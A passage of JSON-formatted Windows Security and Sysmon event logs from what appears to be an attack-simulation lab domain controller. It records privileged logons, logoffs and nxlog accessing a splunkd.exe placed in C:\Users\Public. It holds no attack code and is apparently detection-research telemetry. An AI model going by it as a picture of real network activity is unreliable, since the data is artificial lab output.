06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220424,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x657C2\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x657c2","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220425,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x657C2\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52634\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x657c2","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52634","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220426,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x657C2\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x657c2","LogonType":"3","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4634,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:29.514\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:29.514","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220427,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65D65\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x65d65","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220428,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x65D65\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52635\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x65d65","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52635","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220429,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65D65\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x65d65","LogonType":"3","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220430,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65E10\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x65e10","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220431,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x65E10\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52636\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x65e10","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52636","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220432,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x65E10\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x65e10","LogonType":"3","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:30","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4635,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:30.514\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:30.514","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:54:31","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
